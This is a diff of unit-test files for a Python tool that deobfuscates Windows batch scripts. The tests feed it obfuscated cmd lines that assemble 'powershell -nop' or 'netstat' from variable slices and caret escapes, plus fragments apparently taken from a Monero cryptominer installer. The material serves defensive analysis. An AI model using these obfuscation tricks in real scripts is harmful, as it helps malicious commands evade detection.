("%COMSPEC:\\=/%", "C:/WINDOWS/system32/cmd.exe"),
52+
("%COMSPEC:KeepMatt=Happy%", "C:\\WINDOWS\\system32\\cmd.exe"),
53+
("%COMSPEC:*System32\\=%", "cmd.exe"),
54+
("%COMSPEC:*Tea=Coffee%", "C:\\WINDOWS\\system32\\cmd.exe"),
55+
("%COMSPEC:*e=z%", "zm32\\cmd.exe"),
56+
("%COMSPEC:*e=Z%", "Zm32\\cmd.exe"),
57+
("%COMSPEC:s=z%", "C:\\WINDOWz\\zyztem32\\cmd.exe"),
58+
("%COMSPEC:s=%", "C:\\WINDOW\\ytem32\\cmd.exe"),
59+
("%COMSPEC:*S=A%", "A\\system32\\cmd.exe"),
60+
("%COMSPEC:*s=A%", "A\\system32\\cmd.exe"),
61+
("%COMSPEC:cMD=BlA%", "C:\\WINDOWS\\system32\\BlA.exe"),
62+
# spacing
63+
("%coMSPec:~ -7, +3%", "cmd"),
64+
("%coMSPec:~ -7, +3%", "cmd"),
65+
# tabs
66+
("%coMSPec:~ -7, +3%", "cmd"),
67+
# set
68+
("%comspec:~-16,1%%comspec:~-1%%comspec:~-13,1%", "set"),
69+
],
70+
)
71+
def test_variable_manipulation(statement, result):
72+
deobfuscator = BatchDeobfuscator()
73+
res = deobfuscator.normalize_command(statement)
74+
assert res == result
75+
76+
@staticmethod
77+
@pytest.mark.parametrize(
78+
"logical_line, result",
79+
[
80+
(
81+
"s^et g^c^=^er^s&&s^e^t ^tf=^he^ll&&set^ f^a^=^pow&&^s^et^ dq^=C:\\WINDOWS\\System32\\W^i^n^do^ws^!fa^!^!g^c^!!^t^f^!\\^v^1^.0\\^!^fa!^!^gc!!^tf^!&&^ech^o^ hos^tname^;^ ^ | !dq! -^no^p^ ^-",
82+
[
83+
"set gc=ers",
84+
"set tf=hell",
85+
"set fa=pow",
86+
"set dq=C:\\WINDOWS\\System32\\Windowspowershell\\v1.0\\powershell",
87+
"echo hostname; ^",
88+
"C:\\WINDOWS\\System32\\Windowspowershell\\v1.0\\powershell -nop -",
89+
],
90+
)
91+
],
92+
)
93+
def test_echo_pipe(logical_line, result):
94+
# Could not reproduce exactly what the example is on page 22, but trying something similar.
95+
# The special characters && needs not to be preceeded by ^, or cut by ^.
96+
# The special character | needs not to be preceeded or followed by ^
97+
deobfuscator = BatchDeobfuscator()
98+
commands = deobfuscator.get_commands(logical_line)
99+
res = []
100+
for command in commands:
101+
normalized_comm = deobfuscator.normalize_command(command)
102+
deobfuscator.interpret_command(normalized_comm)
103+
res.append(normalized_comm)
104+
105+
assert len(res) == len(result)
106+
for test_res, expected_res in zip(res, result):
107+
assert test_res == expected_res
108+
109+
@staticmethod
110+
@pytest.mark.parametrize(
111+
"logical_line, result",
112+
[
113+
("set com=netstat /ano&&call %com%", ["set com=netstat /ano", "call netstat /ano"]),
114+
("set com=netstat /ano&&cmd /c %com%", ["set com=netstat /ano", "cmd /c netstat /ano"]),
115+
# Disabled because we are currently returning an empty string on non-found variable, which breaks the
116+
# declaration of !!#**#!! in this case. We'd need to track EnableDelayedExpansion to make it better too.
117+
# (
118+
# "set --$#$--= /ano&&set !!#**#!!=stat&&set .........=net&&call set ''''''''' ''''''=%.........%%!!#**#!!%%--$#$--% &&call %''''''''' ''''''%",
119+
# [
120+
# "set --$#$--= /ano",
121+
# "set !!#**#!!=stat",
122+
# "set .........=net",
123+
# "call set ''''''''' ''''''=netstat /ano",
124+
# "call netstat /ano",
125+
# ],
126+
# ),
127+
(
128+
"set ' = /ano&&set ' =stat&& set ' =net&&call set ' =%' %%' %%' %&&call %' %",
129+
["set ' = /ano", "set ' =stat", "set ' =net", "call set ' =netstat /ano", "call netstat /ano"],
130+
),
131+
(
132+
"set command=neZsZ7Z /7no&&set sub2=!command:7=a!&&set sub1=!sub2:Z=t!&&CALL %sub1%",
133+
["set command=neZsZ7Z /7no", "set sub2=neZsZaZ /ano", "set sub1=netstat /ano", "CALL netstat /ano"],
134+
),
135+
],
136+
)
137+
def test_call_var(logical_line, result):
138+
deobfuscator = BatchDeobfuscator()
139+
commands = deobfuscator.get_commands(logical_line)
140+
res = []
141+
for command in commands:
142+
normalized_comm = deobfuscator.normalize_command(command)
143+
deobfuscator.interpret_command(normalized_comm)
144+
res.append(normalized_comm)
145+
146+
assert len(res) == len(result)
147+
for test_res, expected_res in zip(res, result):
148+
assert test_res == expected_res
149+
150+
@staticmethod
151+
def test_empty_var():
152+
# Taken from https://i.blackhat.com/briefings/asia/2018/asia-18-bohannon-invoke_dosfuscation_techniques_for_fin_style_dos_level_cmd_obfuscation.pdf page 48
153+
# This is one of those weird use-case where EnableDelayedExpansion does a bit difference.
154+
# With EnableDelayedExpansion ON, we lose the ! at the end
155+
# With EnableDelayedExpansion OFF, we keep the ! at the end
156+
deobfuscator = BatchDeobfuscator()
157+
logical_line = 'ec%a%ho "Fi%b%nd Ev%c%il!"'
158+
expected = 'echo "Find Evil"'
159+
normalized_comm = deobfuscator.normalize_command(logical_line)
160+
assert expected == normalized_comm
161+
162+
@staticmethod
163+
@pytest.mark.skip()
164+
@pytest.mark.parametrize(
165+
"logical_line",
166+
[
167+
("""FOR /F "delims=s\\ tokens=4" %%a IN ('set^|findstr PSM') DO %%a hostname"""),
168+
("""FOR /F "delims=.M tokens=3" %%a IN ('assoc^|findstr lMo') DO %%a hostname"""),
169+
("""FOR /F "delims=s\\ tokens=8" %%a IN ('ftype^|findstr lCo') DO %%a hostname"""),
170+
],
171+
)
172+
def test_FOR_execution(logical_line):
173+
"""
174+
This resolves to starting powershell and calling hostname:
175+
FOR /F "delims=s\\ tokens=4" %%a IN ('set^|findstr PSM') DO %%a hostname
176+
177+
You can also get string manipulation out of the "assoc" or "ftype" command to build out the word "powershell"
178+
"""
179+
180+
@staticmethod
181+
@pytest.mark.skip()
182+
@pytest.mark.parametrize(
183+
"logical_line",
184+
[
185+
(
186+
"set unique=nets /ao&&FOR %A IN (0 1 2 3 2 6 2 4 5 6 0 7 1337) DO set final=!final!!unique:~%A,1!&& IF %A==1337 CALL !final:~-12!"
187+
),
188+
(
189+
"set unique=nets /ao&&FOR %A IN (0 1 2 3 2 6 2 4 5 6 0 7 1337) DO set final=!final!!unique:~%A,1!&& IF %A==1337 CALL !final:~7!"
190+
),
191+
(
192+
"set unique=nets /ao&&FOR %A IN (0 1 2 3 2 6 2 4 5 6 0 7 1337) DO set final=!final!!unique:~%A,1!&& IF %A==1337 CALL %final:*final!=%"
193+
),
194+
(
195+
"((sE^T ^ unIQ^uE=OnBeFt^UsS C/AaToE ))&&,; fo^R;,;%^a,;; i^N;,,;( ,+1; 3 5 7 +5 1^3 +5,,9 11 +1^3 +1;;+15 ^+13^37;,),;,;d^O,,(;(;s^Et fI^Nal=!finAl!!uni^Que:~ %^a,1!))&&(;i^F,%^a=^=+13^37,(Ca^lL;%fIn^Al:~-12%))"
196+
),
197+
],
198+
)
199+
def test_call_var_for(logical_line):
200+
"""
201+
set unique=nets /ao&&FOR %A IN (0 1 2 3 2 6 2 4 5 6 0 7 1337) DO set final=!final!!unique:~%A,1!&& IF %A==1337 CALL %final:~-12%
202+
set unique=nets /ao&&FOR %A IN (0 1 2 3 2 6 2 4 5 6 0 7 1337) DO set final=!final!!unique:~%A,1!&& IF %A==1337 CALL %final:~7%
203+
set unique=nets /ao&&FOR %A IN (0 1 2 3 2 6 2 4 5 6 0 7 1337) DO set final=!final!!unique:~%A,1!&& IF %A==1337 CALL %final:*final!=%%
204+
,;c^Md;/^V^:O^N;,;/^C “((sE^T ^ unIQ^uE=OnBeFt^UsS C/AaToE ))&&,; fo^R;,;%^a,;; i^N;,,;( ,+1; 3 5 7 +5 1^3 +5,,9 11 +1^3 +1;;+15 ^+13^37;,),;,;d^O,,(;(;s^Et fI^Nal=!finAl!!uni^Que:~ %^a,1!))&&(;i^F,%^a=^=+13^37,(Ca^lL;%fIn^Al:~-12%))”
205+
"""
206+
207+
@staticmethod
208+
@pytest.mark.skip()
209+
def test_set_reverse():
210+
"""
211+
cmd /V:ON /C “set reverse=ona/ tatsten&& FOR /L %A IN (11 -1 0) DO set final=!final!!reverse:~%A,1!&&IF %A==0 CALL %final:~-12%”
212+
213+
cmd /v /r "set reverse=OoBnFaU/S CtAaTtIsOtNe!n&&FOR /L %A IN (23 -2 1) DO set final=!final!!reverse:~%A,1!&&IF %A==1 CALL %final:~-12%"
214+
215+
,;c^Md;/^V^:O^N;,;/C “((sE^T reVEr^sE=OoBnFaU/S CtAa^TtIsOtNe!n))&&,; fo^R;,;/L,;,%^a,;; i^N;,,;( ,+23; -2;;+1;,) ,;,;d^O,,(;(;s^Et fI^Nal=!finAl!!rev^Erse:~%^a,1!))&& (;i^F,%^a=^=^1,(Ca^lL;%fIn^Al:~-12%))”
216+
"""

‎tests/test_unittests.py

+609
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,609 @@
1+
import pytest
2+
3+
from batch_deobfuscator.batch_interpreter import BatchDeobfuscator
4+
5+
6+
class TestUnittests:
7+
@staticmethod
8+
def test_simple_set():
9+
deobfuscator = BatchDeobfuscator()
10+
deobfuscator.interpret_command("set WALLET=43DTEF92be6XcPj5Z7U")
11+
res = deobfuscator.normalize_command("echo %WALLET%")
12+
assert res == "echo 43DTEF92be6XcPj5Z7U"
13+
14+
@staticmethod
15+
def test_variable_in_for():
16+
deobfuscator = BatchDeobfuscator()
17+
deobfuscator.interpret_command("set WALLET=43DTEF92be6XcPj5Z7U")
18+
cmd = 'for /f "delims=." %%a in ("%WALLET%") do set WALLET_BASE=%%a'
19+
res = deobfuscator.normalize_command(cmd)
20+
assert res == 'for /f "delims=." %%a in ("43DTEF92be6XcPj5Z7U") do set WALLET_BASE=%%a'
21+
22+
@staticmethod
23+
def test_unset_variable():
24+
deobfuscator = BatchDeobfuscator()
25+
cmd = "echo ERROR: Wrong wallet address length (should be 106 or 95): %WALLET_BASE_LEN%"
26+
res = deobfuscator.normalize_command(cmd)
27+
assert res == "echo ERROR: Wrong wallet address length (should be 106 or 95): "
28+
29+
@staticmethod
30+
def test_caret_pipe():
31+
deobfuscator = BatchDeobfuscator()
32+
cmd1 = 'echo tasklist /fi "imagename eq jin.exe" ^| find ":" ^>NUL\n'
33+
cmd2 = [x for x in deobfuscator.get_commands(cmd1)]
34+
assert cmd2 == ['echo tasklist /fi "imagename eq jin.exe" ^| find ":" ^>NUL']
35+
cmd3 = deobfuscator.normalize_command(cmd2[0])
36+
assert cmd3 == 'echo tasklist /fi "imagename eq jin.exe" ^| find ":" ^>NUL'
37+
cmd4 = [x for x in deobfuscator.get_commands(cmd3)]
38+
assert cmd4 == ['echo tasklist /fi "imagename eq jin.exe" ^| find ":" ^>NUL']
39+
40+
@staticmethod
41+
def test_simple_set_a():
42+
deobfuscator = BatchDeobfuscator()
43+
res = deobfuscator.normalize_command("echo %NUMBER_OF_PROCESSORS%")
44+
assert res == "echo 4"
45+
46+
cmd = 'set /a "EXP_MONERO_HASHRATE = %NUMBER_OF_PROCESSORS% * 700 / 1000"'
47+
cmd2 = deobfuscator.normalize_command(cmd)
48+
deobfuscator.interpret_command(cmd2)
49+
cmd3 = deobfuscator.normalize_command("echo %EXP_MONERO_HASHRATE%")
50+
assert cmd3 == "echo (4 * 700 / 1000)"
51+
52+
@staticmethod
53+
@pytest.mark.parametrize(
54+
"var, echo, result",
55+
[
56+
# Simple
57+
# No space
58+
("set EXP=43", "echo *%EXP%*", "echo *43*"),
59+
("set EXP=43", "echo *%EXP %*", "echo **"),
60+
("set EXP=43", "echo *% EXP%*", "echo **"),
61+
("set EXP=43", "echo *% EXP %*", "echo **"),
62+
# Space after var
63+
("set EXP =43", "echo *%EXP%*", "echo **"),
64+
("set EXP =43", "echo *%EXP %*", "echo *43*"),
65+
("set EXP =43", "echo *% EXP%*", "echo **"),
66+
("set EXP =43", "echo *% EXP %*", "echo **"),
67+
# Space after equal
68+
("set EXP= 43", "echo *%EXP%*", "echo * 43*"),
69+
("set EXP= 43", "echo *%EXP %*", "echo **"),
70+
("set EXP= 43", "echo *% EXP%*", "echo **"),
71+
("set EXP= 43", "echo *% EXP %*", "echo **"),
72+
# Space after value
73+
("set EXP=43 ", "echo *%EXP%*", "echo *43 *"),
74+
("set EXP=43 ", "echo *%EXP %*", "echo **"),
75+
("set EXP=43 ", "echo *% EXP%*", "echo **"),
76+
("set EXP=43 ", "echo *% EXP %*", "echo **"),
77+
# Space after var and after equal
78+
("set EXP = 43", "echo *%EXP%*", "echo **"),
79+
("set EXP = 43", "echo *%EXP %*", "echo * 43*"),
80+
("set EXP = 43", "echo *% EXP%*", "echo **"),
81+
("set EXP = 43", "echo *% EXP %*", "echo **"),
82+
# Double quote
83+
# Single quote for both var and value
84+
("set \"'EXP=43'\"", "echo *%EXP%*", "echo **"),
85+
("set \"'EXP=43'\"", "echo *%EXP %*", "echo **"),
86+
("set \"'EXP=43'\"", "echo *% EXP%*", "echo **"),
87+
("set \"'EXP=43'\"", "echo *% EXP %*", "echo **"),
88+
("set \"'EXP=43'\"", "echo *%'EXP%*", "echo *43'*"),
89+
# Space after var
90+
('set "EXP =43"', "echo *%EXP%*", "echo **"),
91+
('set "EXP =43"', "echo *%EXP %*", "echo *43*"),
92+
('set "EXP =43"', "echo *% EXP%*", "echo **"),
93+
('set "EXP =43"', "echo *% EXP %*", "echo **"),
94+
# Space after equal
95+
('set "EXP= 43"', "echo *%EXP%*", "echo * 43*"),
96+
('set "EXP= 43"', "echo *%EXP %*", "echo **"),
97+
('set "EXP= 43"', "echo *% EXP%*", "echo **"),
98+
('set "EXP= 43"', "echo *% EXP %*", "echo **"),
99+
# Space after var and after equal
100+
('set "EXP = 43"', "echo *%EXP%*", "echo **"),
101+
('set "EXP = 43"', "echo *%EXP %*", "echo * 43*"),
102+
('set "EXP = 43"', "echo *% EXP%*", "echo **"),
103+
('set "EXP = 43"', "echo *% EXP %*", "echo **"),
104+
# Space before var, after var, after equal and after value
105+
('set " EXP = 43 "', "echo *%EXP%*", "echo **"),
106+
('set " EXP = 43 "', "echo *%EXP %*", "echo * 43 *"),
107+
('set " EXP = 43 "', "echo *% EXP%*", "echo **"),
108+
('set " EXP = 43 "', "echo *% EXP %*", "echo **"),
109+
# Single quote
110+
("set \"EXP='43'\"", "echo *%EXP%*", "echo *'43'*"),
111+
("set \"EXP=' 43'\"", "echo *%EXP%*", "echo *' 43'*"),
112+
("set \"EXP =' 43'\"", "echo *%EXP %*", "echo *' 43'*"),
113+
("set \"EXP = ' 43'\"", "echo *%EXP %*", "echo * ' 43'*"),
114+
("set 'EXP=\"43\"'", "echo *%'EXP%*", 'echo *"43"\'*'),
115+
("set \" EXP '=43 ' \" ", "echo *%EXP '%*", "echo *43 ' *"),
116+
# Double quote as value
117+
('set EXP =43^"', "echo *%EXP %*", 'echo *43"*'),
118+
('set EXP =43^"3', "echo *%EXP %*", 'echo *43"3*'),
119+
('set "EXP=43^""', "echo *%EXP%*", 'echo *43"*'),
120+
('set "EXP=43^"3"', "echo *%EXP%*", 'echo *43"3*'),
121+
('set EXP=43^"^|', "echo *%EXP%*", 'echo *43"|*'),
122+
# Getting into really weird stuff
123+
("set EXP=4=3", "echo *%EXP%*", "echo *4=3*"),
124+
('set ""EXP=43"', 'echo *%"EXP%*', "echo *43*"),
125+
('set ""EXP=4"3', 'echo *%"EXP%*', "echo *4*"),
126+
('set """EXP=43"', "echo *%EXP%*", "echo **"),
127+
('set """EXP=43"', 'echo *%""EXP%*', "echo *43*"),
128+
('set "E^XP=43"', "echo *%EXP%*", "echo *43*"),
129+
('set " ^"EXP=43"', 'echo *%^"EXP%*', "echo *43*"),
130+
('set ^"EXP=43', "echo *%EXP%*", "echo *43*"),
131+
('set E^"XP=43', 'echo *%E"XP%*', "echo *43*"),
132+
('set E"XP=4"3', 'echo *%E"XP%*', 'echo *4"3*'),
133+
('set E"XP=4^""3', 'echo *%E"XP%*', 'echo *4""3*'),
134+
('set EXP^"=43', 'echo *%EXP"%*', "echo *43*"),
135+
("set EXP=43^^", "echo *%EXP%*", "echo *43*"),
136+
("set EXP=4^^3", "echo *%EXP%*", "echo *43*"),
137+
("set EXP=43^^ ", "echo *%EXP%*", "echo *43 *"),
138+
("set E^^XP=43", "echo *%E^XP%*", "echo *43*"),
139+
('set ^"E^^XP=43"', "echo *%E^XP%*", "echo *43*"),
140+
('set ^"E^^XP=43^"', "echo *%E^XP%*", "echo *43*"),
141+
('set ^"E^^XP=43', "echo *%E^XP%*", "echo *43*"),
142+
('set "E^^XP=43"', "echo *%E^^XP%*", "echo *43*"),
143+
('set "E^^XP=43', "echo *%E^^XP%*", "echo *43*"),
144+
('set E^"XP=4^"3', 'echo *%E"XP%*', 'echo *4"3*'),
145+
('set ^"EXP=4^"3', "echo *%EXP%*", "echo *4*"),
146+
('set ^"EXP= 4^"3', "echo *%EXP%*", "echo * 4*"),
147+
('set ^"E^"XP=43"', 'echo *%E"XP%*', "echo *43*"),
148+
('set ^"E^"XP=4^"3', 'echo *%E"XP%*', "echo *4*"),
149+
('set ^"E"XP=4^"3"', 'echo *%E"XP%*', 'echo *4"3*'),
150+
('set ^"E"XP=4^"3""', 'echo *%E"XP%*', 'echo *4"3"*'),
151+
('set "E"XP=4^"3""', 'echo *%E"XP%*', 'echo *4"3"*'),
152+
('set ^"E""XP=4^"3', 'echo *%E""XP%*', "echo *4*"),
153+
('set "E^"XP=43"', 'echo *%E^"XP%*', "echo *43*"),
154+
('set "E^"X"P=43"', 'echo *%E^"X"P%*', "echo *43*"),
155+
('set E"E^"XP=43"', 'echo *%E"E^"XP%*', 'echo *43"*'),
156+
('set E"E^"XP=43', 'echo *%E"E^"XP%*', "echo *43*"),
157+
('set E^"E"X"P=43"', 'echo *%E"E"X"P%*', 'echo *43"*'),
158+
('set E"E^"X"P=43"', 'echo *%E"E^"X"P%*', 'echo *43"*'),
159+
("set ^|EXP=43", "echo *%|EXP%*", "echo *43*"),
160+
("set EXP=43", "echo *%EXP:/=\\%*", "echo *43*"),
161+
("set EXP=43/43", "echo *%EXP:/=\\%*", "echo *43\\43*"),
162+
("set EXP=43", "echo *%EXP:\\=/%*", "echo *43*"),
163+
("set EXP=43\\43", "echo *%EXP:\\=/%*", "echo *43/43*"),
164+
# TODO: Really, how should we handle that?
165+
# 'set ""EXP=43'
166+
# 'set'
167+
# 'set E'
168+
# 'set EXP'
169+
# 'set ^"E^"XP=43'
170+
# 'set ^"E""XP=43'
171+
#
172+
# option a
173+
('set /a "EXP = 4 * 700 / 1000"', "echo *%EXP%*", "echo *(4 * 700 / 1000)*"),
174+
('set /A "EXP = 4 * 700 / 1000"', "echo *%EXP%*", "echo *(4 * 700 / 1000)*"),
175+
('SET /A "EXP = 4 * 700 / 1000"', "echo *%EXP%*", "echo *(4 * 700 / 1000)*"),
176+
('SET /a "EXP = 4 * 700 / 1000"', "echo *%EXP%*", "echo *(4 * 700 / 1000)*"),
177+
("set /a EXP = 4 * 700 / 1000", "echo *%EXP%*", "echo *(4 * 700 / 1000)*"),
178+
('set /a ^"EXP = 4 * 700 / 1000"', "echo *%EXP%*", "echo *(4 * 700 / 1000)*"),
179+
('set /a ^"E^"XP = 4 * 700 / 1000^"', "echo *%EXP%*", "echo *(4 * 700 / 1000)*"),
180+
('set /a "EXP^" = 4 * 700 / 1000"', "echo *%EXP%*", "echo *(4 * 700 / 1000)*"),
181+
("set /a EX^^P = 4 * 700 / 1000", "echo *%EXP%*", "echo *(4 * 700 / 1000)*"),
182+
("set /a EX^P = 4 * 700 / 1000", "echo *%EXP%*", "echo *(4 * 700 / 1000)*"),
183+
("set /a EXP = 4 * OTHER", "echo *%EXP%*", "echo *(4 * OTHER)*"),
184+
("set/a EXP = 4 * 2", "echo *%EXP%*", "echo *(4 * 2)*"),
185+
("set/AEXP=43", "echo *%EXP%*", "echo *(43)*"),
186+
("set/AEXP=4 * 3", "echo *%EXP%*", "echo *(4 * 3)*"),
187+
# TODO: Really, how should we handle that?
188+
# 'set /a "EX|P = 4 * 700 / 1000'
189+
# "set /a EX|P = 4 * 700 / 1000"
190+
# "set /a EX^|P = 4 * 700 / 1000"
191+
#
192+
# option p
193+
('set /p "EXP"="What is"', 'echo *%EXP"%*', "echo *__input__*"),
194+
('set /p EXP="What is', "echo *%EXP%*", "echo *__input__*"),
195+
("set /p EXP=What is", "echo *%EXP%*", "echo *__input__*"),
196+
("SET /p EXP=What is", "echo *%EXP%*", "echo *__input__*"),
197+
("SET /P EXP=What is", "echo *%EXP%*", "echo *__input__*"),
198+
("set /P EXP=What is", "echo *%EXP%*", "echo *__input__*"),
199+
('set /p EXP "=What is', 'echo *%EXP "%*', "echo *__input__*"),
200+
('set /p EXP "=What is', 'echo *%EXP "%*', "echo *__input__*"),
201+
('set /p "EXP =What is', "echo *%EXP %*", "echo *__input__*"),
202+
('set /p "EXP ="What is"', "echo *%EXP %*", "echo *__input__*"),
203+
('set /p E"XP =What is', 'echo *%E"XP %*', "echo *__input__*"),
204+
('set /p E^"XP ="What is"', 'echo *%E"XP %*', "echo *__input__*"),
205+
('set /p "E^"XP ="What is"', 'echo *%E^"XP %*', "echo *__input__*"),
206+
('set /p E^"XP =What is', 'echo *%E"XP %*', "echo *__input__*"),
207+
('set /p "E^|XP =What is', "echo *%E^|XP %*", "echo *__input__*"),
208+
("set /p E^|XP =What is", "echo *%E|XP %*", "echo *__input__*"),
209+
('set /p ^"EXP =What is', "echo *%EXP %*", "echo *__input__*"),
210+
("set /p ^|EXP =What is", "echo *%|EXP %*", "echo *__input__*"),
211+
# TODO: Really, how should we handle that?
212+
# 'set /p "EXP "=What is'
213+
# 'set /p "E^"XP =What is'
214+
# What about some weird echo statement now?
215+
("set EXP=43", "echo %EXP%", "echo 43"),
216+
("set EXP=43", "echo !EXP!", "echo 43"),
217+
("set EXP=43", "echo ^%EXP%", "echo 43"),
218+
("set EXP=43", "echo ^!EXP!", "echo 43"),
219+
# ("set EXP=43", "echo ^%EX^P%", "echo 43"), # That's wrong... it actually prints the next line. Ignoring.
220+
("set EXP=43", "echo ^!EX^P!", "echo 43"),
221+
# ("set EXP=43", "echo ^%EXP^%", "echo 43"), # That's wrong... it actually prints the next line. Ignoring.
222+
("set EXP=43", "echo ^!EXP^!", "echo 43"),
223+
],
224+
)
225+
def test_set_command(var, echo, result):
226+
deobfuscator = BatchDeobfuscator()
227+
deobfuscator.interpret_command(var)
228+
res = deobfuscator.normalize_command(echo)
229+
assert res == result
230+
231+
@staticmethod
232+
def test_clear_variable_with_set():
233+
# If you specify only a variable and an equal sign (without <string>) for the set command,
234+
# the <string> value associated with the variable is cleared (as if the variable is not there).
235+
deobfuscator = BatchDeobfuscator()
236+
assert "exp" not in deobfuscator.variables
237+
res = deobfuscator.normalize_command("echo *%EXP%*")
238+
assert res == "echo **"
239+
deobfuscator.interpret_command("set EXP=43")
240+
assert "exp" in deobfuscator.variables
241+
res = deobfuscator.normalize_command("echo *%EXP%*")
242+
assert res == "echo *43*"
243+
deobfuscator.interpret_command("set EXP= ")
244+
assert "exp" in deobfuscator.variables
245+
res = deobfuscator.normalize_command("echo *%EXP%*")
246+
assert res == "echo * *"
247+
deobfuscator.interpret_command("set EXP=")
248+
assert "exp" not in deobfuscator.variables
249+
res = deobfuscator.normalize_command("echo *%EXP%*")
250+
assert res == "echo **"
251+
252+
@staticmethod
253+
@pytest.mark.skip()
254+
def test_beautify_strlen_function():
255+
# Figure out if it translate somewhat correctly, and how to make it more readable after processing
256+
# Taken from 6c46550db4dcb3f5171c69c5f1723362f99ec0f16f6d7ab61b6f8d169a6e6bc8
257+
"""
258+
":strlen string len"
259+
"setlocal EnableDelayedExpansion"
260+
'set "token=#%~1" & set "len=0"'
261+
"for /L %%A in (12,-1,0) do ("
262+
' set/A "len|=1<<%%A"'
263+
' for %%B in (!len!) do if "!token:~%%B,1!"=="" set/A "len&=~1<<%%A"'
264+
")"
265+
"""
266+
267+
@staticmethod
268+
@pytest.mark.parametrize(
269+
"statement, commands",
270+
[
271+
('IF "A"=="A" echo AAA', ['IF "A"=="A" (', "echo AAA", ")"]),
272+
('IF "A"=="A" (echo AAA)', ['IF "A"=="A" (', "echo AAA", ")"]),
273+
('IF "A"=="A" (echo AAA) ELSE echo BBB', ['IF "A"=="A" (', "echo AAA", ") ELSE (", "echo BBB", ")"]),
274+
(
275+
'echo ABC && IF "A"=="A" (echo AAA) ELSE echo BBB',
276+
["echo ABC", 'IF "A"=="A" (', "echo AAA", ") ELSE (", "echo BBB", ")"],
277+
),
278+
(
279+
'echo ABC && IF "A"=="A" (echo AAA) ELSE (echo BBB)',
280+
["echo ABC", 'IF "A"=="A" (', "echo AAA", ") ELSE (", "echo BBB", ")"],
281+
),
282+
(
283+
'IF EXIST "%USERPROFILE%\\jin" GOTO REMOVE_DIR1',
284+
['IF EXIST "%USERPROFILE%\\jin" (', "GOTO REMOVE_DIR1", ")"],
285+
),
286+
(
287+
"IF defined EXP (echo Defined) ELSE (echo Undef)",
288+
["IF defined EXP (", "echo Defined", ") ELSE (", "echo Undef", ")"],
289+
),
290+
(
291+
"if %EXP% gtr 8192 ( set PORT=18192 & goto PORT_OK )",
292+
["if %EXP% gtr 8192 (", " set PORT=18192", "goto PORT_OK )"],
293+
),
294+
("if %EXP% gtr 8192 (", ["if %EXP% gtr 8192 ("]),
295+
(
296+
"if %errorLevel% == 0 (set ADMIN=1) else (set ADMIN=0)",
297+
["if %errorLevel% == 0 (", "set ADMIN=1", ") else (", "set ADMIN=0", ")"],
298+
),
299+
(
300+
'if exist "%USERPROFILE%\\Start Menu\\Programs" (echo AAA)',
301+
['if exist "%USERPROFILE%\\Start Menu\\Programs" (', "echo AAA", ")"],
302+
),
303+
(
304+
'if exist "%USERPROFILE%\\Start Menu\\Programs" echo AAA',
305+
['if exist "%USERPROFILE%\\Start Menu\\Programs" (', "echo AAA", ")"],
306+
),
307+
(
308+
"if [%var%]==[value] echo AAA",
309+
["if [%var%]==[value] (", "echo AAA", ")"],
310+
),
311+
(
312+
'if "%var%"==[value] echo AAA',
313+
['if "%var%"==[value] (', "echo AAA", ")"],
314+
),
315+
],
316+
)
317+
def test_if_statements(statement, commands):
318+
deobfuscator = BatchDeobfuscator()
319+
assert [x for x in deobfuscator.get_commands(statement)] == commands
320+
321+
@staticmethod
322+
def test_single_quote_var_name_rewrite_1():
323+
deobfuscator = BatchDeobfuscator()
324+
325+
cmd = "%os:~-4,1%%comspec:~-1,1%%comspec:~14,1%%commonprogramfiles:~-6,1%'=^^^1^^^\\^^^)%comspec:~-13,1%u^^^,^^^%pathext:~31,1%b^^^8%commonprogramfiles:~9,1%^^^^^^^/v^^^&^^^U%os:~-9,1%^^^%pathext:~6,1%k%programfiles:~-12,1%p^^^[^^^*^^^@^^^~%programfiles:~-8,1%^^^%pathext:~11,1%q%comspec:~-14,1%^^^%commonprogramfiles:~24,1%^^^R^^^%pathext:~12,1%^^^0f^^^I^^^%comspec:~-9,1%^^^{^^^$%comspec:~-7,1%^^^K%programfiles:~-2,1%^^^7^^^9z%commonprogramfiles:~-11,1%^^^G^^^%os:~9,1%^^^L^^^=^^^(%commonprogramfiles:~-16,1%^^^%commonprogramfiles:~-12,1%h%comspec:~-15,1%^^^6^^^%commonprogramfiles:~10,1%^^^\"^^^Q^^^_^^^%pathext:~2,1%j^^^`%commonprogramfiles:~6,1%^^^Y^^^]^^^+^^^%pathext:~18,1%^^^-^^^%pathext:~26,1%^^^|^^^%comspec:~17,1%^^^%pathext:~7,1%^^^<%commonprogramfiles:~22,1%^^^%pathext:~17,1%^^^;^^^%os:~-10,1%^^^%os:~8,1%^^^%pathext:~41,1%^^^>^^^}^^^#^^^'%os:~-7,1%^^^.^^^5%os:~5,1%^^^4^^^:^^^%programfiles:~3,1%^^^%pathext:~47,1%%comspec:~25,1%^^^?^^^Z" # noqa: E501
326+
cmd2 = deobfuscator.normalize_command(cmd)
327+
deobfuscator.interpret_command(cmd2)
328+
assert deobfuscator.variables["'"].startswith("^1^\\^)tu^")
329+
330+
cmd = "%':~43,1%%':~-96,1%%':~6,1%"
331+
cmd2 = deobfuscator.normalize_command(cmd)
332+
assert cmd2 == "set"
333+
334+
cmd = "echo AAA%':~-138,1%%':~43,1%%':~-96,1%%':~6,1%%':~89,1%%':~-20,1%%':~-82,1%abbbc%':~-138,1%set mj=kx"
335+
cmd2 = deobfuscator.normalize_command(cmd)
336+
for cmd in deobfuscator.get_commands(cmd2):
337+
cmd2 = deobfuscator.normalize_command(cmd)
338+
deobfuscator.interpret_command(cmd2)
339+
assert deobfuscator.variables["'"] == "abbbc"
340+
341+
@staticmethod
342+
@pytest.mark.parametrize(
343+
"cmd, result",
344+
[
345+
("echo %0", "echo script.bat"),
346+
("echo %1", "echo "),
347+
("echo %~0", "echo script.bat"),
348+
("echo %~1", "echo "),
349+
("echo %~s0", "echo script.bat"),
350+
("echo %~s1", "echo "),
351+
("echo %~f0", "echo script.bat"),
352+
("echo %~f1", "echo "),
353+
("echo %~d0", "echo script.bat"),
354+
("echo %~d1", "echo "),
355+
("echo %~p0", "echo script.bat"),
356+
("echo %~p1", "echo "),
357+
("echo %~z0", "echo script.bat"),
358+
("echo %~z1", "echo "),
359+
("echo %~a0", "echo script.bat"),
360+
("echo %~a1", "echo "),
361+
# ("echo %~xsa0", "echo script.bat"),
362+
# ("echo %~xsa1", "echo "),
363+
("echo %3c%3%A", "echo cA"),
364+
("echo %3c%3%A%", "echo c"),
365+
("echo %*", "echo "),
366+
("echo %*a", "echo a"),
367+
],
368+
)
369+
def test_args(cmd, result):
370+
deobfuscator = BatchDeobfuscator()
371+
372+
res = deobfuscator.normalize_command(cmd)
373+
assert res == result
374+
375+
@staticmethod
376+
